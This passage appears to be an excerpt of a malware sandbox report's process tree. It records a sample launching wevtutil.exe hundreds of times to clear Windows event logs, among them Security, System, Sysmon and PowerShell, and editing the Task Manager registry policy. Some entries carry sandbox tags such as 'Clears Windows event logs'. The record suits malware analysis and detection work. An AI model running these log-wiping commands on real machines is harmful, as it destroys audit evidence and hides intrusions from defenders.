wevtutil.exe cl "Microsoft-Windows-Privacy-Auditing/Operational"
3⤵
PID:2512

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Provisioning-Diagnostics-Provider/Admin"
3⤵
PID:3884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Diagnostic"
3⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Developer/Debug"
3⤵
PID:2556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Proximity-Common/Performance"
3⤵
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Admin"
3⤵
PID:712

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-PushNotification-Platform/Debug"
3⤵
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-QoS-Pacer/Diagnostic"
3⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RPC/Debug"
3⤵
PID:4736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RRAS/Operational"
3⤵
PID:2680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Ras-NdisWanPacketCapture/Diagnostic"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:1772

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReFS/Operational"
3⤵
PID:3864

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ReadyBoost/Operational"
3⤵
- Clears Windows event logs
PID:2844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Regsvr32/Operational"
3⤵
PID:3348

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Admin"
3⤵
- Clears Windows event logs
PID:2012

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RdpCoreTS/Debug"
3⤵
PID:456

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-RemoteFX-Synth3dvsc/Admin"
3⤵
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RemoteDesktopServices-SessionServices/Operational"
3⤵
PID:924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Resource-Exhaustion-Resolver/Operational"
3⤵
PID:4440

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RetailDemo/Admin"
3⤵
PID:716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-RetailDemo/Operational"
3⤵
PID:2464

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Networking-BackgroundTransfer/Tracing"
3⤵
PID:4060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Networking/Tracing"
3⤵
PID:2904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime-Windows-Media/WinRTAdaptiveMediaSource"
3⤵
PID:4928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Runtime/CreateInstance"
3⤵
- Clears Windows event logs
PID:2432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/Operational"
3⤵
PID:412

C:\Windows\SysWOW64\reg.exe
reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 0 /f
4⤵
PID:4616

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBClient/ObjectStateDiagnostic"
3⤵
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Analytic"
3⤵
PID:3884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Audit"
3⤵
PID:3232

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SMBServer/Performance"
3⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sdbus/Debug"
3⤵
PID:3592

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SearchUI/Operational"
3⤵
PID:1884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Security-UserConsentVerifier/Audit"
3⤵
PID:4932

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SecurityMitigationsBroker/Operational"
3⤵
- Clears Windows event logs
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sensors/Debug"
3⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ServiceReportingApi/Debug"
3⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-Azure/Debug"
3⤵
PID:840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync-OneDrive/Operational"
3⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SettingSync/VerboseDebug"
3⤵
PID:1420

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ShareMedia-ControlPanel/Diagnostic"
3⤵
PID:2736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-CredUI/Diagnostic"
3⤵
PID:5020

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-ConnectedAccountState/ActionCenter"
3⤵
PID:320

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Shell-AuthUI-Shutdown/Diagnostic"
3⤵
PID:1912

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-Audit/Authentication"
3⤵
PID:1892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmartCard-DeviceEnum/Operational"
3⤵
PID:5060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SmbClient/Security"
3⤵
PID:4720

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StateRepository/Operational"
3⤵
- Clears Windows event logs
PID:3996

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Admin"
3⤵
PID:4992

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ATAPort/Analytic"
3⤵
PID:3680

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-ClassPnP/Admin"
3⤵
PID:548

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-Disk/Debug"
3⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Storage-Storport/Analytic"
3⤵
PID:672

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorageSettings/Diagnostic"
3⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-StorageSpaces-ManagementAgent/WHC"
3⤵
PID:1704

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Superfetch/StoreLog"
3⤵
PID:1668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysmon/Operational"
3⤵
PID:2196

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Sysprep/Analytic"
3⤵
PID:1640

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-SystemSettingsThreshold/Operational"
3⤵
PID:2168

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TSF-msutb/Diagnostic"
3⤵
PID:1892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TWinUI/Operational"
3⤵
PID:3392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TZSync/Operational"
3⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TaskScheduler/Maintenance"
3⤵
PID:1104

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ClientUSBDevices/Operational"
3⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-LocalSessionManager/Operational"
3⤵
PID:4192

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-PnPDevices/Operational"
3⤵
PID:400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-Printers/Admin"
3⤵
PID:928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RDPClient/Analytic"
3⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RdpSoundDriver/Capture"
3⤵
- Clears Windows event logs
PID:4804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-RemoteConnectionManager/Operational"
3⤵
PID:4628

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-TerminalServices-ServerUSBDevices/Operational"
3⤵
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Tethering-Manager/Analytic"
3⤵
PID:1820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ThemeUI/Diagnostic"
3⤵
PID:1396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Troubleshooting-Recommended/Operational"
3⤵
PID:3884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UIAnimation/Diagnostic"
3⤵
PID:1912

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-User Device Registration/Admin"
3⤵
PID:5060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UserPnp/ActionCenter"
3⤵
- Clears Windows event logs
PID:4272

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-UxInit/Diagnostic"
3⤵
- Clears Windows event logs
PID:692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VHDMP-Operational"
3⤵
PID:4992

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-VPN-Client/Operational"
3⤵
PID:4716

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Volume/Diagnostic"
3⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WCN-Config-Registrar/Diagnostic"
3⤵
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WFP/Operational"
3⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WLANConnectionFlow/Diagnostic"
3⤵
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMI-Activity/Operational"
3⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WMPNSS-Service/Operational"
3⤵
PID:1432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WPD-MTPClassDriver/Operational"
3⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WUSA/Debug"
3⤵
PID:2556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WSC-SRV/Diagnostic"
3⤵
PID:2056

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO/Diagnostic"
3⤵
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WiFiDisplay/Analytic"
3⤵
PID:3392

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Power"
3⤵
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinMDE/MDE"
3⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Operational"
3⤵
PID:4980

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Debug"
3⤵
PID:1564

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wininit/Diagnostic"
3⤵
PID:1308

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-WS2HELP/Operational"
3⤵
PID:3356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WlanDlg/Analytic"
3⤵
PID:3884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Debug"
3⤵
PID:4068

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WorkFolders/Operational"
3⤵
PID:3688

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-XAML/Default"
3⤵
PID:2256

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-XAudio2/Debug"
3⤵
PID:712

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-glcnd/Diagnostic"
3⤵
PID:2696

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui-perf"
3⤵
PID:100

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-wmbclass/Analytic"
3⤵
PID:3816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-WindowsPhone-Net-Cellcore-CellManager/Debug"
3⤵
PID:224

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OpenSSH/Operational"
3⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "RTWorkQueueTheading"
3⤵
PID:3328

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "SmbWmiAnalytic"
3⤵
PID:436

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel/IHM"
3⤵
PID:1356

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_VC1ENC_CHANNEL"
3⤵
PID:876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_wmvdecod_CHANNEL"
3⤵
PID:1332

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Windows Networking Vpn Plugin Platform/OperationalVerbose"
3⤵
PID:3376

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "muxencode"
3⤵
PID:2092

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WordChannel"
3⤵
PID:3524

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Windows PowerShell"
3⤵
- Clears Windows event logs
PID:4820

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Windows Networking Vpn Plugin Platform/Operational"
3⤵
PID:2468

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WMPSyncEngine"
3⤵
PID:396

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WMPSetup"
3⤵
PID:4628

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_WMPHOTO_CHANNEL"
3⤵
PID:672

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2VDEC_CHANNEL"
3⤵
- Clears Windows event logs
PID:972

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_MSMPEG2ADEC_CHANNEL"
3⤵
PID:768

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_MP4SDECD_CHANNEL"
3⤵
PID:1860

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_MFH264Enc_CHANNEL"
3⤵
PID:812

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "WINDOWS_KS_CHANNEL"
3⤵
PID:448

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Uac/Debug"
3⤵
PID:1188

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "UIManager_Channel"
3⤵
PID:3280

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "TimeBroker"
3⤵
PID:3368

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "TabletPC_InputPanel_Channel"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4084

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "SystemEventsBroker"
3⤵
PID:2804

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "System"
3⤵
PID:5072

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Setup"
3⤵
- Clears Windows event logs
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Security"
3⤵
PID:4128

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "SMSApi"
3⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "RTWorkQueueExtended"
3⤵
PID:1384

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "PlayReadyPerformanceChannel"
3⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Physical_Keyboard_Manager_Channel"
3⤵
PID:2172

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OpenSSH/Debug"
3⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OpenSSH/Admin"
3⤵
PID:1504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OfficeDebugChannel"
3⤵
PID:372

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OfficeChannel"
3⤵
PID:4104

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OSK_SoftKeyboard_Channel"
3⤵
PID:4388

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "OAlerts"
3⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Network Isolation Operational"
3⤵
PID:1764

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Navigator"
3⤵
PID:4516

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-WindowsPhone-Net-Cellcore-CellularAPI/Debug"
3⤵
PID:3864

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-WindowsPhone-LocationServiceProvider/Debug"
3⤵
PID:5060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-WindowsPhone-Connectivity-WiFiConnSvc-Channel"
3⤵
PID:1892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-wmbclass/Trace"
3⤵
PID:4052

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-stobject/Diagnostic"
3⤵
PID:1884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-osk/Diagnostic"
3⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-ntshrui"
3⤵
PID:4268

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-mobsync/Diagnostic"
3⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-glcnd/Debug"
3⤵
PID:4736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-glcnd/Admin"
3⤵
PID:4876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-XAudio2/Performance"
3⤵
- Clears Windows event logs
PID:4544

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-XAML-Diagnostics/Default"
3⤵
PID:1872

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Workplace Join/Admin"
3⤵
PID:4664

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WorkFolders/WHC"
3⤵
PID:3724

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WorkFolders/Debug"
3⤵
PID:1108

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WorkFolders/Analytic"
3⤵
PID:3232

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Diagnostic"
3⤵
- Clears Windows event logs
PID:4240

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wordpad/Admin"
3⤵
PID:3788

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Operational"
3⤵
PID:1612

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wired-AutoConfig/Diagnostic"
3⤵
PID:4956

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsrv/Analytic"
3⤵
PID:1432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-NameResolution/Operational"
3⤵
PID:2736

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winsock-AFD/Operational"
3⤵
PID:4600

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Operational"
3⤵
PID:3424

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Winlogon/Diagnostic"
3⤵
PID:432

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Operational"
3⤵
PID:3352

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUpdateClient/Analytic"
3⤵
- Clears Windows event logs
PID:5116

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUIImmersive/Operational"
3⤵
PID:3224

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsUIImmersive/Diagnostic"
3⤵
PID:2576

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Tracing"
3⤵
PID:4988

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsSystemAssessmentTool/Operational"
3⤵
PID:1140

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsColorSystem/Operational"
3⤵
PID:2844

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WindowsBackup/ActionCenter"
3⤵
PID:2044

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallVerbose"
3⤵
PID:4060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/FirewallDiagnostics"
3⤵
PID:1160

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/Firewall"
3⤵
PID:2668

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurityVerbose"
3⤵
PID:2840

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windows Firewall With Advanced Security/ConnectionSecurity"
3⤵
PID:888

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Windeploy/Analytic"
3⤵
PID:4556

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinURLMon/Analytic"
3⤵
PID:1180

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Debug"
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:928

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinRM/Analytic"
3⤵
PID:400

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinNat/Trace"
3⤵
PID:1876

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinNat/Oper"
3⤵
PID:1604

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinML/Analytic"
3⤵
PID:3924

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/WebSocket"
3⤵
PID:1324

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/UsageLog"
3⤵
PID:4128

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet/Analytic"
3⤵
PID:4932

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet-Config/ProxyConfigChanged"
3⤵
PID:1484

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinINet-Capture/Analytic"
3⤵
PID:1904

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHttp/Diagnostic"
3⤵
PID:5032

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WinHTTP-NDF/Diagnostic"
3⤵
PID:2172

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/UIPI"
3⤵
PID:3208

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Tracing"
3⤵
PID:4568

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Render"
3⤵
PID:1504

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Operational"
3⤵
PID:4104

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Messages"
3⤵
PID:4388

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Contention"
3⤵
PID:920

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Win32k/Concurrency"
3⤵
PID:1764

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Websocket-Protocol-Component/Tracing"
3⤵
PID:1288

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebcamProvider/Analytic"
3⤵
- Clears Windows event logs
PID:4516

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebServices/Tracing"
3⤵
PID:5060

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebPlatStorage-Server"
3⤵
PID:1892

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebIO-NDF/Diagnostic"
3⤵
PID:3816

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebAuthN/Operational"
3⤵
- Clears Windows event logs
PID:1884

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WebAuth/Operational"
3⤵
PID:4692

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wcmsvc/Operational"
3⤵
PID:100

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-Wcmsvc/Diagnostic"
3⤵
PID:4268

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Operational"
3⤵
PID:2748

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-SVC-Events/Diagnostic"
3⤵
PID:3592

C:\Windows\SysWOW64\wevtutil.exe
wevtutil.exe cl "Microsoft-Windows-WWAN-NDISUIO-EVENTS/Diagnostic"
3⤵
PID:2588

C:\Windows\SysWOW64\wevtutil.exe
